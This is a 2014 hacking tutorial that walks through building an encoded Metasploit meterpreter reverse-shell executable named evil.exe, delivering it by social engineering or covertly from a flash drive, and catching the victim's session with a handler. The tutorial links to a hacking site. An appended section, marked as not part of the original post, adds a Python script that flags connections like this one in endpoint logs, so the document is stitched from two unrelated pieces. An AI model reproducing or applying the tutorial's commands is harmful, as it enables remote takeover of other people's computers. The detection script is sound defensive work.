Metasploit Payload: What exactly is metasploit?
What exactly is Metasploit? Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code which can interact with other programs to let the attacker (you) execute bits of code on the victim's computer. It also has a wonderful tool known as msfpayload.

What is msfpayload? msfpayload is used in conjunction with msfcli and msfencode. Together, they are a set of tools which creates a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on their computer and for them to execute it. (Or just sneak a flash drive in while they're not looking and execute it for them, but I don't recommend that.) Sounds great, right? So how do you do it?

||Tutorial starts here||

I will be using Backtrack 5 R3, and using msfconsole. To start it off, update msf by starting a terminal and running msfupdate. It will say "Updated to revision #####" when finished. Now execute msfconsole (which will take a few moments to load). After it shows the msf banner, it will give you the msf prompt "msf >". Type show payloads. This gives you a list of all the payloads available. We are going to use windows/meterpreter/reverse_tcp. Type use windows/meterpreter/reverse_tcp and it will bring you into that module. Type info to see what options are required and other useful information.

We see that there are three options needed: EXITFUNC, LHOST, and LPORT. EXITFUNC is just how the program will show up on Windows; you don't really need to care about that. LHOST is your IP address, so the program will know where to connect back to, and LPORT is the port it will connect back on. EXITFUNC and LPORT already have default values placed in them, which work fine and we don't need to change. LHOST, on the other hand, does need a value. This is your IP address. If you are performing this over a LAN, then you just need your LAN IP, such as 192.168.2.5. If you are performing this over WAN, use your WAN address and have correct port forwarding (and pray nobody traces it back to you). We set LHOST by typing set LHOST 192.168.2.5. If we run info again, it shows our LHOST as the IP we put in.

With all that in order, we now just type generate -e x86/shikata_ga_nai -i 30 -t exe -f evil.exe, which will create the file in your Home folder. Take that file and copy it on to a flash drive.

Now for the second part (much quicker than the first). Go back to your terminal and type back to be brought back to the main msf menu. We are going to use the handler to listen for connections, so type use exploit/multi/handler to set the module. Now to set the options, type exactly the following, in order:

set PAYLOAD windows/meterpreter/reverse_tcp (the payload we generated earlier)
set LHOST 192.168.2.5 (your IP address, whatever that may be)
set LPORT 4444 (the default port)
exploit

and the handler is started. When somebody executes that file we made earlier, it connects back to your computer, and the listener we just created handles that connect-back. When somebody executes it, you will have a session created. Just type sessions 1 and you will connect.

For more tutorials go to: learn2hack.pw/
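Seen from the defender's side, the connect-back described in this tutorial leaves an endpoint trace: a freshly dropped executable (on removable media or in a user-writable folder) opens an outbound TCP connection, by default to port 4444. The following is an added example, not part of the original post or of the Metasploit project: a small Python triage script that parses constructed endpoint network-connection records (the key=value format and field names are an assumption loosely modelled on Sysmon network-connection events) and flags connections matching those two traits. The sample records, including the "evil.exe" name borrowed from the post, are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample records (format assumed; loosely modelled on Sysmon
# Event ID 3 fields). Backslashes are doubled for the Python string literal.
SAMPLE_LOG = """\
Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe Protocol=tcp Initiated=true DestinationIp=93.184.216.34 DestinationPort=443
Image=E:\\evil.exe Protocol=tcp Initiated=true DestinationIp=192.168.2.5 DestinationPort=4444
Image=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe Protocol=tcp Initiated=true DestinationIp=10.0.0.9 DestinationPort=8080
Image=C:\\Windows\\System32\\svchost.exe Protocol=tcp Initiated=true DestinationIp=10.0.0.1 DestinationPort=53
Image=C:\\Windows\\System32\\svchost.exe Protocol=tcp Initiated=false DestinationIp=10.0.0.7 DestinationPort=445
"""

# key=value pairs whose values may contain spaces (e.g. "Program Files"):
# a value runs lazily until the next " Key=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# Heuristic (an assumption for this example): executables launched from a
# non-system drive letter (removable media) or from a user-writable folder.
SUSPICIOUS_PATH = re.compile(
    r"^(?:[D-Z]:\\|C:\\Users\\[^\\]+\\AppData\\|C:\\Users\\[^\\]+\\Downloads\\)",
    re.IGNORECASE,
)

# The handler in the post listens on Metasploit's default LPORT, 4444.
# Operators change this trivially, so the port rule alone is weak evidence;
# the path rule is what catches a renamed port.
WATCHED_PORTS = {4444}


@dataclass
class Finding:
    image: str
    dest: str
    reason: str


def parse_event(line: str) -> dict:
    """Turn one key=value record into a dict."""
    return dict(FIELD_RE.findall(line))


def assess(event: dict) -> Optional[Finding]:
    """Return a Finding for an outbound TCP connection that trips a rule, else None."""
    if event.get("Protocol") != "tcp" or event.get("Initiated") != "true":
        return None  # only connections the process itself opened
    image = event.get("Image", "")
    try:
        port = int(event.get("DestinationPort", "0"))
    except ValueError:
        return None  # malformed record; skip rather than crash the scan
    dest = f"{event.get('DestinationIp', '?')}:{port}"
    reasons = []
    if port in WATCHED_PORTS:
        reasons.append(f"destination port {port} is the default Metasploit handler port")
    if SUSPICIOUS_PATH.match(image):
        reasons.append("executable runs from removable media or a user-writable directory")
    if not reasons:
        return None
    return Finding(image=image, dest=dest, reason="; ".join(reasons))


def scan(log_text: str) -> List[Finding]:
    """Scan a block of records and return findings in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = assess(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[!] {f.image} -> {f.dest}: {f.reason}")
```

Running it on the sample flags the connection from the removable drive to 192.168.2.5:4444 on both rules and the Temp-folder executable on the path rule alone, while browser, DNS and inbound SMB traffic pass. In practice the path and port heuristics would be tuned against an allowlist of known software, and a hit would be pivoted into process-creation and file-origin events for the flagged image.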
Posted on: Sun, 12 Oct 2014 14:05:42 +0000